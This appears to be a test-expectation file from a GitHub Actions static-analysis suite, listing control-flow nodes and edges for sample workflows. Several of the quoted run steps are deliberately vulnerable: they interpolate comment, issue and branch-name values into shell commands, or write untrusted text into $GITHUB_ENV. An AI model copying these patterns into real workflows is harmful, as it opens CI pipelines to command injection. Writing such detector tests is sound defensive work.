.github/workflows/poisonable_steps.yml:29:14:29:42 | xvfb-run ./mvnw clean package | .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | -| .github/workflows/poisonable_steps.yml:29:14:29:42 | xvfb-run ./mvnw clean package | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:29:14:29:42 | xvfb-run ./mvnw clean package | .github/workflows/poisonable_steps.yml:29:9:30:6 | Run Step | -| .github/workflows/poisonable_steps.yml:30:9:31:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:30:14:30:46 | echo "foo" && npm i && echo "bar" | .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | -| .github/workflows/poisonable_steps.yml:30:14:30:46 | echo "foo" && npm i && echo "bar" | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:30:14:30:46 | echo "foo" && npm i && echo "bar" | .github/workflows/poisonable_steps.yml:30:9:31:6 | Run Step | -| .github/workflows/poisonable_steps.yml:31:9:32:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:31:14:31:44 | echo "foo" \| npm i \| echo "bar" | .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | -| .github/workflows/poisonable_steps.yml:31:14:31:44 | echo "foo" \| npm i \| echo "bar" | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:31:14:31:44 | echo "foo" \| npm i \| echo "bar" | .github/workflows/poisonable_steps.yml:31:9:32:6 | Run Step | -| .github/workflows/poisonable_steps.yml:32:9:33:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:32:14:32:44 | echo "foo" \| npm i \| echo "bar" | .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | -| 
.github/workflows/poisonable_steps.yml:32:14:32:44 | echo "foo" \| npm i \| echo "bar" | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:32:14:32:44 | echo "foo" \| npm i \| echo "bar" | .github/workflows/poisonable_steps.yml:32:9:33:6 | Run Step | -| .github/workflows/poisonable_steps.yml:33:9:34:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:33:14:33:35 | echo "foo `npm i` bar" | .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | -| .github/workflows/poisonable_steps.yml:33:14:33:35 | echo "foo `npm i` bar" | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:33:14:33:35 | echo "foo `npm i` bar" | .github/workflows/poisonable_steps.yml:33:9:34:6 | Run Step | -| .github/workflows/poisonable_steps.yml:34:9:35:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:34:14:34:52 | dotnet test foo/Tests.csproj -c Release | .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | -| .github/workflows/poisonable_steps.yml:34:14:34:52 | dotnet test foo/Tests.csproj -c Release | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:34:14:34:52 | dotnet test foo/Tests.csproj -c Release | .github/workflows/poisonable_steps.yml:34:9:35:6 | Run Step | -| .github/workflows/poisonable_steps.yml:35:9:36:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:35:14:35:26 | go run foo.go | .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | -| .github/workflows/poisonable_steps.yml:35:14:35:26 | go run foo.go | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | -| 
.github/workflows/poisonable_steps.yml:35:14:35:26 | go run foo.go | .github/workflows/poisonable_steps.yml:35:9:36:6 | Run Step | -| .github/workflows/poisonable_steps.yml:36:9:37:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:36:14:36:86 | sed -i "s\|git_branch = .*\|git_branch = \\"$GITHUB_HEAD_REF\\"\|" config.json | .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | -| .github/workflows/poisonable_steps.yml:36:14:36:86 | sed -i "s\|git_branch = .*\|git_branch = \\"$GITHUB_HEAD_REF\\"\|" config.json | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:36:14:36:86 | sed -i "s\|git_branch = .*\|git_branch = \\"$GITHUB_HEAD_REF\\"\|" config.json | .github/workflows/poisonable_steps.yml:36:9:37:6 | Run Step | -| .github/workflows/poisonable_steps.yml:37:9:38:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:37:14:37:51 | sed -f ./config.sed file.txt > foo.txt | .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | -| .github/workflows/poisonable_steps.yml:37:14:37:51 | sed -f ./config.sed file.txt > foo.txt | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:37:14:37:51 | sed -f ./config.sed file.txt > foo.txt | .github/workflows/poisonable_steps.yml:37:9:38:6 | Run Step | -| .github/workflows/poisonable_steps.yml:38:9:39:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:38:14:38:45 | sed -f config file.txt > foo.txt | .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | -| .github/workflows/poisonable_steps.yml:38:14:38:45 | sed -f config file.txt > foo.txt | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | -| 
.github/workflows/poisonable_steps.yml:38:14:38:45 | sed -f config file.txt > foo.txt | .github/workflows/poisonable_steps.yml:38:9:39:6 | Run Step | -| .github/workflows/poisonable_steps.yml:39:9:40:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:39:14:39:55 | echo "foo" \| awk -f ./config.awk > foo.txt | .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | -| .github/workflows/poisonable_steps.yml:39:14:39:55 | echo "foo" \| awk -f ./config.awk > foo.txt | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:39:14:39:55 | echo "foo" \| awk -f ./config.awk > foo.txt | .github/workflows/poisonable_steps.yml:39:9:40:6 | Run Step | -| .github/workflows/poisonable_steps.yml:40:9:41:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:40:14:40:73 | gcloud builds submit --quiet --substitutions="COMMIT_SHA=foo | .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | -| .github/workflows/poisonable_steps.yml:40:14:40:73 | gcloud builds submit --quiet --substitutions="COMMIT_SHA=foo | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:40:14:40:73 | gcloud builds submit --quiet --substitutions="COMMIT_SHA=foo | .github/workflows/poisonable_steps.yml:40:9:41:6 | Run Step | -| .github/workflows/poisonable_steps.yml:41:9:42:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:41:14:41:22 | ./foo/cmd | .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | -| .github/workflows/poisonable_steps.yml:41:14:41:22 | ./foo/cmd | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:41:14:41:22 | ./foo/cmd | 
.github/workflows/poisonable_steps.yml:41:9:42:6 | Run Step | -| .github/workflows/poisonable_steps.yml:42:9:46:111 | Run Step | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:42:14:46:111 | sed -e 's##TITLE#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##${TITLE}#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | -| .github/workflows/poisonable_steps.yml:42:14:46:111 | sed -e 's##TITLE#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##${TITLE}#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:42:14:46:111 | sed -e 's##TITLE#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##${TITLE}#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | .github/workflows/poisonable_steps.yml:42:9:46:111 | Run Step | -| .github/workflows/poisonable_steps.yml:44:32:44:50 | env.sot_repo | .github/workflows/poisonable_steps.yml:42:14:46:111 | sed -e 's##TITLE#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##${TITLE}#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | -| .github/workflows/test.yml:1:5:1:8 | push | .github/workflows/test.yml:1:1:40:53 | on: push | -| .github/workflows/test.yml:1:5:1:8 | push | .github/workflows/test.yml:1:1:40:53 | on: push | -| .github/workflows/test.yml:1:5:1:8 | push | .github/workflows/test.yml:1:5:1:8 | push | -| .github/workflows/test.yml:1:5:1:8 | push | .github/workflows/test.yml:1:5:1:8 | push | -| .github/workflows/test.yml:1:5:1:8 | push | .github/workflows/test.yml:1:5:1:8 | push | -| .github/workflows/test.yml:5:5:31:2 | Job: job1 | .github/workflows/test.yml:1:1:40:53 | on: push | 
-| .github/workflows/test.yml:5:14:5:26 | ubuntu-latest | .github/workflows/test.yml:1:1:40:53 | on: push | -| .github/workflows/test.yml:5:14:5:26 | ubuntu-latest | .github/workflows/test.yml:5:5:31:2 | Job: job1 | -| .github/workflows/test.yml:8:7:10:4 | Job outputs node | .github/workflows/test.yml:1:1:40:53 | on: push | -| .github/workflows/test.yml:8:7:10:4 | Job outputs node | .github/workflows/test.yml:5:5:31:2 | Job: job1 | -| .github/workflows/test.yml:8:7:10:4 | Job outputs node | .github/workflows/test.yml:8:7:10:4 | Job outputs node | -| .github/workflows/test.yml:8:19:8:49 | ${{ steps.step.outputs.value }} | .github/workflows/test.yml:1:1:40:53 | on: push | -| .github/workflows/test.yml:8:19:8:49 | ${{ steps.step.outputs.value }} | .github/workflows/test.yml:5:5:31:2 | Job: job1 | -| .github/workflows/test.yml:8:19:8:49 | ${{ steps.step.outputs.value }} | .github/workflows/test.yml:8:7:10:4 | Job outputs node | -| .github/workflows/test.yml:8:20:8:50 | steps.step.outputs.value | .github/workflows/test.yml:8:19:8:49 | ${{ steps.step.outputs.value }} | -| .github/workflows/test.yml:11:9:15:6 | Uses Step | .github/workflows/test.yml:5:5:31:2 | Job: job1 | -| .github/workflows/test.yml:11:15:11:33 | actions/checkout@v4 | .github/workflows/test.yml:1:1:40:53 | on: push | -| .github/workflows/test.yml:11:15:11:33 | actions/checkout@v4 | .github/workflows/test.yml:5:5:31:2 | Job: job1 | -| .github/workflows/test.yml:11:15:11:33 | actions/checkout@v4 | .github/workflows/test.yml:11:9:15:6 | Uses Step | -| .github/workflows/test.yml:13:24:13:24 | 0 | .github/workflows/test.yml:1:1:40:53 | on: push | -| .github/workflows/test.yml:13:24:13:24 | 0 | .github/workflows/test.yml:5:5:31:2 | Job: job1 | -| .github/workflows/test.yml:13:24:13:24 | 0 | .github/workflows/test.yml:11:9:15:6 | Uses Step | -| .github/workflows/test.yml:15:9:19:6 | Uses Step: source | .github/workflows/test.yml:5:5:31:2 | Job: job1 | -| .github/workflows/test.yml:15:15:15:31 | Get changed 
files | .github/workflows/test.yml:1:1:40:53 | on: push | -| .github/workflows/test.yml:15:15:15:31 | Get changed files | .github/workflows/test.yml:5:5:31:2 | Job: job1 | -| .github/workflows/test.yml:15:15:15:31 | Get changed files | .github/workflows/test.yml:15:9:19:6 | Uses Step: source | -| .github/workflows/test.yml:16:13:16:18 | source | .github/workflows/test.yml:1:1:40:53 | on: push | -| .github/workflows/test.yml:16:13:16:18 | source | .github/workflows/test.yml:5:5:31:2 | Job: job1 | -| .github/workflows/test.yml:16:13:16:18 | source | .github/workflows/test.yml:15:9:19:6 | Uses Step: source | -| .github/workflows/test.yml:17:15:17:42 | tj-actions/changed-files@v40 | .github/workflows/test.yml:1:1:40:53 | on: push | -| .github/workflows/test.yml:17:15:17:42 | tj-actions/changed-files@v40 | .github/workflows/test.yml:5:5:31:2 | Job: job1 | -| .github/workflows/test.yml:17:15:17:42 | tj-actions/changed-files@v40 | .github/workflows/test.yml:15:9:19:6 | Uses Step: source | -| .github/workflows/test.yml:19:9:26:6 | Uses Step: step | .github/workflows/test.yml:5:5:31:2 | Job: job1 | -| .github/workflows/test.yml:19:15:19:43 | Remove foo from changed files | .github/workflows/test.yml:1:1:40:53 | on: push | -| .github/workflows/test.yml:19:15:19:43 | Remove foo from changed files | .github/workflows/test.yml:5:5:31:2 | Job: job1 | -| .github/workflows/test.yml:19:15:19:43 | Remove foo from changed files | .github/workflows/test.yml:19:9:26:6 | Uses Step: step | -| .github/workflows/test.yml:20:13:20:16 | step | .github/workflows/test.yml:1:1:40:53 | on: push | -| .github/workflows/test.yml:20:13:20:16 | step | .github/workflows/test.yml:5:5:31:2 | Job: job1 | -| .github/workflows/test.yml:20:13:20:16 | step | .github/workflows/test.yml:19:9:26:6 | Uses Step: step | -| .github/workflows/test.yml:21:15:21:55 | mad9000/actions-find-and-replace-string@3 | .github/workflows/test.yml:1:1:40:53 | on: push | -| .github/workflows/test.yml:21:15:21:55 | 
mad9000/actions-find-and-replace-string@3 | .github/workflows/test.yml:5:5:31:2 | Job: job1 | -| .github/workflows/test.yml:21:15:21:55 | mad9000/actions-find-and-replace-string@3 | .github/workflows/test.yml:19:9:26:6 | Uses Step: step | -| .github/workflows/test.yml:23:19:23:63 | ${{ steps.source.outputs.all_changed_files }} | .github/workflows/test.yml:1:1:40:53 | on: push | -| .github/workflows/test.yml:23:19:23:63 | ${{ steps.source.outputs.all_changed_files }} | .github/workflows/test.yml:5:5:31:2 | Job: job1 | -| .github/workflows/test.yml:23:19:23:63 | ${{ steps.source.outputs.all_changed_files }} | .github/workflows/test.yml:19:9:26:6 | Uses Step: step | -| .github/workflows/test.yml:23:20:23:64 | steps.source.outputs.all_changed_files | .github/workflows/test.yml:23:19:23:63 | ${{ steps.source.outputs.all_changed_files }} | -| .github/workflows/test.yml:24:17:24:21 | foo | .github/workflows/test.yml:1:1:40:53 | on: push | -| .github/workflows/test.yml:24:17:24:21 | foo | .github/workflows/test.yml:5:5:31:2 | Job: job1 | -| .github/workflows/test.yml:24:17:24:21 | foo | .github/workflows/test.yml:19:9:26:6 | Uses Step: step | -| .github/workflows/test.yml:25:20:25:21 | | .github/workflows/test.yml:1:1:40:53 | on: push | -| .github/workflows/test.yml:25:20:25:21 | | .github/workflows/test.yml:5:5:31:2 | Job: job1 | -| .github/workflows/test.yml:25:20:25:21 | | .github/workflows/test.yml:19:9:26:6 | Uses Step: step | -| .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | .github/workflows/test.yml:5:5:31:2 | Job: job1 | -| .github/workflows/test.yml:26:13:26:23 | simplesink1 | .github/workflows/test.yml:1:1:40:53 | on: push | -| .github/workflows/test.yml:26:13:26:23 | simplesink1 | .github/workflows/test.yml:5:5:31:2 | Job: job1 | -| .github/workflows/test.yml:26:13:26:23 | simplesink1 | .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | -| .github/workflows/test.yml:27:14:27:63 | echo ${{ steps.source.outputs.all_changed_files }} | 
.github/workflows/test.yml:1:1:40:53 | on: push | -| .github/workflows/test.yml:27:14:27:63 | echo ${{ steps.source.outputs.all_changed_files }} | .github/workflows/test.yml:5:5:31:2 | Job: job1 | -| .github/workflows/test.yml:27:14:27:63 | echo ${{ steps.source.outputs.all_changed_files }} | .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | -| .github/workflows/test.yml:27:20:27:64 | steps.source.outputs.all_changed_files | .github/workflows/test.yml:27:14:27:63 | echo ${{ steps.source.outputs.all_changed_files }} | -| .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | .github/workflows/test.yml:5:5:31:2 | Job: job1 | -| .github/workflows/test.yml:28:13:28:23 | simplesink2 | .github/workflows/test.yml:1:1:40:53 | on: push | -| .github/workflows/test.yml:28:13:28:23 | simplesink2 | .github/workflows/test.yml:5:5:31:2 | Job: job1 | -| .github/workflows/test.yml:28:13:28:23 | simplesink2 | .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | -| .github/workflows/test.yml:29:14:29:54 | ${{ github.event.pull_request.head.ref }} | .github/workflows/test.yml:1:1:40:53 | on: push | -| .github/workflows/test.yml:29:14:29:54 | ${{ github.event.pull_request.head.ref }} | .github/workflows/test.yml:5:5:31:2 | Job: job1 | -| .github/workflows/test.yml:29:14:29:54 | ${{ github.event.pull_request.head.ref }} | .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | -| .github/workflows/test.yml:29:15:29:55 | github.event.pull_request.head.ref | .github/workflows/test.yml:29:14:29:54 | ${{ github.event.pull_request.head.ref }} | -| .github/workflows/test.yml:32:5:40:53 | Job: job2 | .github/workflows/test.yml:1:1:40:53 | on: push | -| .github/workflows/test.yml:32:14:32:26 | ubuntu-latest | .github/workflows/test.yml:1:1:40:53 | on: push | -| .github/workflows/test.yml:32:14:32:26 | ubuntu-latest | .github/workflows/test.yml:32:5:40:53 | Job: job2 | -| .github/workflows/test.yml:34:9:34:23 | ${{ always() }} | 
.github/workflows/test.yml:1:1:40:53 | on: push | -| .github/workflows/test.yml:34:9:34:23 | ${{ always() }} | .github/workflows/test.yml:1:1:40:53 | on: push | -| .github/workflows/test.yml:34:9:34:23 | ${{ always() }} | .github/workflows/test.yml:32:5:40:53 | Job: job2 | -| .github/workflows/test.yml:34:9:34:23 | ${{ always() }} | .github/workflows/test.yml:32:5:40:53 | Job: job2 | -| .github/workflows/test.yml:34:9:34:23 | ${{ always() }} | .github/workflows/test.yml:34:9:34:23 | ${{ always() }} | -| .github/workflows/test.yml:34:9:34:23 | ${{ always() }} | .github/workflows/test.yml:34:9:34:23 | ${{ always() }} | -| .github/workflows/test.yml:34:10:34:24 | always() | .github/workflows/test.yml:34:9:34:23 | ${{ always() }} | -| .github/workflows/test.yml:34:11:34:25 | always() | .github/workflows/test.yml:34:9:34:23 | ${{ always() }} | -| .github/workflows/test.yml:36:12:36:15 | job1 | .github/workflows/test.yml:1:1:40:53 | on: push | -| .github/workflows/test.yml:36:12:36:15 | job1 | .github/workflows/test.yml:32:5:40:53 | Job: job2 | -| .github/workflows/test.yml:36:12:36:15 | job1 | .github/workflows/test.yml:32:5:40:53 | Job: job2 | -| .github/workflows/test.yml:36:12:36:15 | job1 | .github/workflows/test.yml:36:12:36:15 | job1 | -| .github/workflows/test.yml:39:9:40:53 | Run Step: sink | .github/workflows/test.yml:32:5:40:53 | Job: job2 | -| .github/workflows/test.yml:39:13:39:16 | sink | .github/workflows/test.yml:1:1:40:53 | on: push | -| .github/workflows/test.yml:39:13:39:16 | sink | .github/workflows/test.yml:32:5:40:53 | Job: job2 | -| .github/workflows/test.yml:39:13:39:16 | sink | .github/workflows/test.yml:39:9:40:53 | Run Step: sink | -| .github/workflows/test.yml:40:14:40:52 | echo ${{needs.job1.outputs.job_output}} | .github/workflows/test.yml:1:1:40:53 | on: push | -| .github/workflows/test.yml:40:14:40:52 | echo ${{needs.job1.outputs.job_output}} | .github/workflows/test.yml:32:5:40:53 | Job: job2 | -| .github/workflows/test.yml:40:14:40:52 | 
echo ${{needs.job1.outputs.job_output}} | .github/workflows/test.yml:39:9:40:53 | Run Step: sink | -| .github/workflows/test.yml:40:20:40:53 | needs.job1.outputs.job_output | .github/workflows/test.yml:40:14:40:52 | echo ${{needs.job1.outputs.job_output}} | -cfgNodes -| .github/workflows/expression_nodes.yml:1:1:21:47 | enter on: issue_comment | -| .github/workflows/expression_nodes.yml:1:1:21:47 | exit on: issue_comment | -| .github/workflows/expression_nodes.yml:1:1:21:47 | exit on: issue_comment (normal) | -| .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | -| .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | -| .github/workflows/expression_nodes.yml:7:9:8:6 | Run Step | -| .github/workflows/expression_nodes.yml:7:14:7:58 | LINE 1echo '${{ github.event.comment.body }}' | -| .github/workflows/expression_nodes.yml:7:27:7:58 | github.event.comment.body | -| .github/workflows/expression_nodes.yml:8:9:10:6 | Run Step | -| .github/workflows/expression_nodes.yml:8:14:9:57 | LINE 1 echo '${{ github.event.comment.body }}'\n | -| .github/workflows/expression_nodes.yml:9:25:9:56 | github.event.comment.body | -| .github/workflows/expression_nodes.yml:10:9:13:6 | Run Step | -| .github/workflows/expression_nodes.yml:10:14:12:53 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\n | -| .github/workflows/expression_nodes.yml:11:25:11:56 | github.event.comment.body | -| .github/workflows/expression_nodes.yml:12:24:12:51 | github.event.issue.body | -| .github/workflows/expression_nodes.yml:13:9:16:6 | Run Step | -| .github/workflows/expression_nodes.yml:13:14:15:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}'\n | -| .github/workflows/expression_nodes.yml:14:9:15:46 | github.event.comment.body | -| .github/workflows/expression_nodes.yml:14:9:15:46 | github.event.issue.body | -| .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | -| 
.github/workflows/expression_nodes.yml:16:14:19:57 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\nLINE 3 echo '${{ github.event.comment.body }}'\n | -| .github/workflows/expression_nodes.yml:17:25:17:56 | github.event.comment.body | -| .github/workflows/expression_nodes.yml:18:24:18:51 | github.event.issue.body | -| .github/workflows/expression_nodes.yml:19:24:19:55 | github.event.comment.body | -| .github/workflows/expression_nodes.yml:20:9:21:47 | Run Step | -| .github/workflows/expression_nodes.yml:20:14:21:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}' | -| .github/workflows/expression_nodes.yml:20:14:21:46 | github.event.comment.body | -| .github/workflows/expression_nodes.yml:20:14:21:46 | github.event.issue.body | -| .github/workflows/multiline2.yml:1:1:89:35 | enter on: | -| .github/workflows/multiline2.yml:1:1:89:35 | exit on: | -| .github/workflows/multiline2.yml:1:1:89:35 | exit on: (normal) | -| .github/workflows/multiline2.yml:1:1:89:35 | on: | -| .github/workflows/multiline2.yml:9:5:89:35 | Job: Test | -| .github/workflows/multiline2.yml:11:9:15:6 | Run Step | -| .github/workflows/multiline2.yml:11:14:14:54 | echo "changelog< event.json\n ${{ toJson(github.event) }}\nEOF\n | -| .github/workflows/multiline2.yml:32:13:32:39 | toJson(github.event) | -| .github/workflows/multiline2.yml:34:9:40:6 | Run Step | -| .github/workflows/multiline2.yml:35:14:39:14 | cat \| tee -a $GITHUB_ENV << EOL\n${ISSUE_BODY}\nFOO\nEOL\n | -| .github/workflows/multiline2.yml:40:9:46:6 | Run Step | -| .github/workflows/multiline2.yml:41:14:45:14 | cat > issue.txt << EOL\n${ISSUE_BODY}\nFOO\nEOL\n | -| .github/workflows/multiline2.yml:46:9:52:6 | Run Step | -| .github/workflows/multiline2.yml:47:14:51:14 | cat << EOL \| tee -a $GITHUB_ENV\n${ISSUE_BODY}\nFOO\nEOL\n | -| .github/workflows/multiline2.yml:52:9:58:6 | Run Step | -| .github/workflows/multiline2.yml:53:14:57:14 | cat < 
file.txt\nHello\nWorld\nEOF\n | -| .github/workflows/multiline2.yml:58:9:63:6 | Run Step | -| .github/workflows/multiline2.yml:59:14:62:14 | cat <<-EOF \| tee -a "$GITHUB_ENV"\necho "FOO=$TITLE"\nEOF\n | -| .github/workflows/multiline2.yml:63:9:66:6 | Run Step | -| .github/workflows/multiline2.yml:64:14:65:142 | echo REPO_NAME=$(cat issue.txt \| sed 's/\\\\r/\\\\n/g' \| grep -ioE '\\\\s*[a-z0-9_-]+/[a-z0-9_-]+\\\\s*$' \| tr -d ' ') \| tee -a $GITHUB_ENV\n | -| .github/workflows/multiline2.yml:66:9:71:6 | Run Step | -| .github/workflows/multiline2.yml:67:14:70:42 | echo "PR_TITLE<> $GITHUB_OUTPUT\necho -e "$FILTERED_CHANGELOG" >> $GITHUB_OUTPUT\necho "CHANGELOGEOF" >> $GITHUB_OUTPUT\n | -| .github/workflows/multiline.yml:15:9:20:6 | Run Step | -| .github/workflows/multiline.yml:15:14:19:40 | EOF=$(dd if=/dev/urandom bs=15 count=1 status=none \| base64)\necho "status<<$EOF" >> $GITHUB_OUTPUT\necho "$(cat status.output.json)" >> $GITHUB_OUTPUT\necho "$EOF" >> $GITHUB_OUTPUT\n | -| .github/workflows/multiline.yml:20:9:24:6 | Run Step | -| .github/workflows/multiline.yml:20:14:23:40 | echo "response<<$EOF" >> $GITHUB_OUTPUT\necho $output >> $GITHUB_OUTPUT\necho "$EOF" >> $GITHUB_OUTPUT\n | -| .github/workflows/multiline.yml:24:9:30:6 | Run Step | -| .github/workflows/multiline.yml:24:14:29:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | -| .github/workflows/multiline.yml:30:9:34:6 | Run Step | -| .github/workflows/multiline.yml:30:14:33:14 | cat <<-"EOF" > event.json\n ${{ toJson(github.event) }}\nEOF\n | -| .github/workflows/multiline.yml:32:13:32:39 | toJson(github.event) | -| .github/workflows/multiline.yml:34:9:40:6 | Run Step | -| .github/workflows/multiline.yml:35:14:39:14 | cat >> $GITHUB_ENV << EOL\n${ISSUE_BODY}\nFOO\nEOL\n | -| .github/workflows/multiline.yml:40:9:46:6 | Run Step | -| .github/workflows/multiline.yml:41:14:45:14 | cat > issue.txt << EOL\n${ISSUE_BODY}\nFOO\nEOL\n | -| .github/workflows/multiline.yml:46:9:52:6 | Run Step | -| 
.github/workflows/multiline.yml:47:14:51:14 | cat << EOL >> $GITHUB_ENV\n${ISSUE_BODY}\nFOO\nEOL\n | -| .github/workflows/multiline.yml:52:9:58:6 | Run Step | -| .github/workflows/multiline.yml:53:14:57:14 | cat < file.txt\nHello\nWorld\nEOF\n | -| .github/workflows/multiline.yml:58:9:63:6 | Run Step | -| .github/workflows/multiline.yml:59:14:62:14 | cat <<-EOF >> "$GITHUB_ENV"\necho "FOO=$TITLE"\nEOF\n | -| .github/workflows/multiline.yml:63:9:66:6 | Run Step | -| .github/workflows/multiline.yml:64:14:65:136 | echo REPO_NAME=$(cat issue.txt \| sed 's/\\\\r/\\\\n/g' \| grep -ioE '\\\\s*[a-z0-9_-]+/[a-z0-9_-]+\\\\s*$' \| tr -d ' ') >> $GITHUB_ENV\n | -| .github/workflows/multiline.yml:66:9:71:6 | Run Step | -| .github/workflows/multiline.yml:67:14:70:36 | echo "PR_TITLE<> $GITHUB_ENV\necho "$TITLE" >> $GITHUB_ENV\necho "EOF" >> $GITHUB_ENV\n | -| .github/workflows/multiline.yml:71:9:78:6 | Run Step | -| .github/workflows/multiline.yml:72:14:77:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | -| .github/workflows/multiline.yml:78:9:85:6 | Run Step | -| .github/workflows/multiline.yml:79:14:84:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | -| .github/workflows/multiline.yml:85:9:89:29 | Run Step | -| .github/workflows/multiline.yml:86:14:89:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | -| .github/workflows/poisonable_steps.yml:1:1:46:111 | enter on: push | -| .github/workflows/poisonable_steps.yml:1:1:46:111 | exit on: push | -| .github/workflows/poisonable_steps.yml:1:1:46:111 | exit on: push (normal) | -| .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | -| .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:7:9:8:6 | Run Step | -| .github/workflows/poisonable_steps.yml:7:14:7:30 | venv/bin/activate | -| .github/workflows/poisonable_steps.yml:8:9:13:6 | Uses Step | -| .github/workflows/poisonable_steps.yml:11:53:11:75 | github.workspace | -| 
.github/workflows/poisonable_steps.yml:13:9:14:6 | Run Step | -| .github/workflows/poisonable_steps.yml:13:14:13:32 | . venv/bin/activate | -| .github/workflows/poisonable_steps.yml:14:9:15:6 | Run Step | -| .github/workflows/poisonable_steps.yml:14:14:14:42 | echo foo; . venv/bin/activate | -| .github/workflows/poisonable_steps.yml:15:9:16:6 | Run Step | -| .github/workflows/poisonable_steps.yml:15:14:15:41 | echo foo;. venv/bin/activate | -| .github/workflows/poisonable_steps.yml:16:9:17:6 | Run Step | -| .github/workflows/poisonable_steps.yml:16:14:16:42 | echo foo \|. venv/bin/activate | -| .github/workflows/poisonable_steps.yml:17:9:18:6 | Run Step | -| .github/workflows/poisonable_steps.yml:17:14:17:32 | ./venv/bin/activate | -| .github/workflows/poisonable_steps.yml:18:9:19:6 | Run Step | -| .github/workflows/poisonable_steps.yml:18:14:18:36 | sh venv/bin/activate.sh | -| .github/workflows/poisonable_steps.yml:19:9:20:6 | Run Step | -| .github/workflows/poisonable_steps.yml:19:14:19:44 | echo $(sh 